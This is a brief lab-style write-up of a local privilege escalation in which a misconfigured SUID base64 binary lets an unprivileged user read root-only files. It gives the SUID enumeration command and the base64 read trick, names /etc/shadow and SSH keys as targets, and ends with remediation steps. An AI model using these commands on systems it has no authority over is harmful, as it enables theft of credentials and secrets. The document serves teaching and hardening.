SUID Misuse. Privilege Escalation via `base64`
Overview
Set-UID (SUID) allows a program to run with the privileges of its owner. If a root-owned binary that can read files is marked SUID, it becomes a privilege escalation vector.
Description
A root-owned SUID base64 binary allows any local user to read root-only files.
Impact
Any local user can read sensitive files such as /etc/shadow, SSH keys, and secrets, leading to full compromise.
Root Cause
The binary /usr/bin/base64 was incorrectly marked SUID.
Proof of Concept
Root creates a protected file
root@bs:~# ls -la /usr/share/secrets.txt
-r-------- 1 root root 30 Jan 7 20:27 /usr/share/secrets.txt
Low-privileged user
root@bs:~# id user135
uid=1001(user135) gid=1003(user135) groups=1003(user135)
Attempt to read the file
user135@bs:~$ cat /usr/share/secrets.txt
cat: /usr/share/secrets.txt: Permission denied
Attacker enumerates SUID binaries
user135@bs:~$ find / -perm -4000 -type f \
! -path "/snap/*" \
! -path "/usr/lib/snapd/*" 2>/dev/null
Output:
/usr/bin/mount
/usr/bin/base64 # <-- the vulnerability
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/sudo
Exploitation:
user135@bs:~$ base64 /usr/share/secrets.txt | base64 -d
Ohh... you hacked my secrets!
Remediations
- Remove the SUID bit from
base64.sudo chmod u-s /usr/bin/base64 - Audit for other dangerous SUID binaries.
- Remove SUID from any utility capable of reading or executing arbitrary files.